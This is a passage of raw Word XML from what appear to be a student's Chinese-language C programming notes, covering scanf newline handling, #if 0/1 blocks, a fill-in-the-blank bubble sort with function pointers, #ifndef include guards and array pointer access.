    <w:p w14:paraId="1FDDACF9" w14:textId="6B2EB5FA" w:rsidR="00B4152F" w:rsidRPr="007903BE" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %c</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;char2) </w:t>
      </w:r>
      <w:r w:rsidR="00B4152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该利用了</w:t>
      </w:r>
      <w:r w:rsidR="00B4152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r w:rsidR="00B4152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不严格特性，来吃掉那个</w:t>
      </w:r>
      <w:r w:rsidR="00B4152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidR="00B4152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A27D2" w14:textId="77777777" w:rsidR="007903BE" w:rsidRPr="007903BE" w:rsidRDefault="007903BE" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B2A3C0" w14:textId="243AB363" w:rsidR="007903BE" w:rsidRDefault="00C15872" w:rsidP="00D333A3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#if-endif</w:t>
      </w:r>
      <w:r w:rsidR="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可运行代码注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC84D1" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3"/>
    <w:p w14:paraId="61E34D74" w14:textId="13F1266E" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Data stucture and Algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目学到的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB6FB3" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3"/>
    <w:p w14:paraId="0645C3E2" w14:textId="2D3D8418" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3">
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，就是真注释，代码不运行，如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，代码运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18CA00" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3"/>
    <w:p w14:paraId="3EEA89A7" w14:textId="30F7F739" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#if 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67924028" w14:textId="4EDF0F97" w:rsidR="00D333A3" w:rsidRPr="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314C223" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRPr="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00D333A3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#if 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>int IsLess(int a, int b) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    return a &lt; b;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>int IsLarger(int a, int b) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    return a &gt; b;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>// Define a function pointer type, which points to a function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>typedef int (*ComparatorFuncPtr)(int, int);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>void BubbleSort2(int *ptr, int n, ComparatorFuncPtr compare) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    for (int iMax = n - 2; iMax &gt;= 0; iMax--) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">        for (int i = 0; ____Q1_____; _____Q2____) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">            if (_____Q3_____) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">                ____Q4____;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">        }       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">int TestBubbleSort2(void) {    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    int arr[] = {30, 50, 20, 10, 60, 40};</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    int len = sizeof(arr) / sizeof(arr[0]);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    // a function pointer variable which points to the function IsLarger()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    ComparatorFuncPtr fptr = &amp;IsLarger;    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    printf("Before sorting:\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    PrintArray(arr, len);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    BubbleSort2(arr, len, fptr);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    // in ascending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    printf("After sorting:\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    PrintArray(arr, len);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    // a function pointer variable which points to the function IsLess()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    fptr = ____Q5____;    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    printf("\nBefore sorting:\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    PrintArray(arr, len);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    BubbleSort2(arr, len, fptr);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    // in descending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    printf("After sorting:\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    PrintArray(arr, len);</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D333A3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972B9A6" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRPr="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A43FF90" w14:textId="77777777" w:rsidR="00D333A3" w:rsidRDefault="00D333A3" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DA3CCA" w14:textId="77777777" w:rsidR="00732D63" w:rsidRPr="00732D63" w:rsidRDefault="00732D63" w:rsidP="00732D63">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00732D63">
        <w:t>#ifndef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35253B2D" w14:textId="77777777" w:rsidR="00732D63" w:rsidRDefault="00732D63" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164D2573" w14:textId="6C1BA077" w:rsidR="00732D63" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#ifndef</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个预处理指令，用于条件编译。它的主要用途是防止头文件被多次包含。通常，它与</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用，以</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>确保一个文件只会被包含一次。这样可以避免由于重复包含同一文件而导致的编译错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F4FB7" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D17EC3" w14:textId="17767E06" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCAF290" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#ifndef EXAMPLE_H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33530DBB" w14:textId="5CCA427A" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#define EXAMPLE_H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14427D88" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是头文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDEE1D4" w14:textId="37CD5F35" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>void myFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D019C" w14:textId="448A48F9" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#endif // EXAMPLE_H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F126D69" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AE1CA9" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D3328C" w14:textId="101A4DFD" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71471300" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:t>当编译器第一次遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t xml:space="preserve"> #ifndef EXAMPLE_H </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXAMPLE_H </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>尚未定义，它将继续编译并定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXAMPLE_H</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0E7CD" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00053DD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00053DD5">
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>该头文件被后续其他文件再次包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t xml:space="preserve">#ifndef </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>会发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t xml:space="preserve"> EXAMPLE_H </w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>已经定义，编译器将</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>跳过该文件的内容，从而避免重复定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00053DD5">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3CF84" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146A9AB3" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77716248" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B3483E" w14:textId="77777777" w:rsidR="00053DD5" w:rsidRPr="00053DD5" w:rsidRDefault="00053DD5" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7722BCFE" w14:textId="77777777" w:rsidR="00732D63" w:rsidRDefault="00732D63" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0085AF75" w14:textId="77777777" w:rsidR="00732D63" w:rsidRDefault="00732D63" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EA2055" w14:textId="2EE17516" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组指针及访问方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914C4D9" w14:textId="1ADBA660" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有负数下标的访问方式，不如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD2955" w14:textId="340B85B2" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7">
      <w:r w:rsidRPr="00C520D7">
        <w:t>arr[-1] in C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178D3C0E" w14:textId="77777777" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7"/>
    <w:p w14:paraId="2BC5C432" w14:textId="4328FC64" w:rsidR="00C520D7" w:rsidRPr="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7">
      <w:r w:rsidRPr="00C520D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>访问地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B0285" w14:textId="2E73A4A2" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C520D7">
        <w:t>&amp;arr[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17071687" w14:textId="08B69AD5" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rr+</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>arr+i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个元素的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A40BB" w14:textId="77777777" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C7FDA2" w14:textId="04CC5A97" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C520D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>访问值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B138DC4" w14:textId="77777777" w:rsidR="00C520D7" w:rsidRPr="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C520D7">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C520D7">
        <w:t>*(arr+i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5430A6" w14:textId="613EDC8C" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rr[i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A79BD" w14:textId="77777777" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1382E0A7" w14:textId="10E85078" w:rsidR="00592C73" w:rsidRDefault="00BE0B4A" w:rsidP="00BE0B4A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符指针</w:t>
      </w:r>
      <w:r w:rsidR="00995DD3">
        <w:rPr>
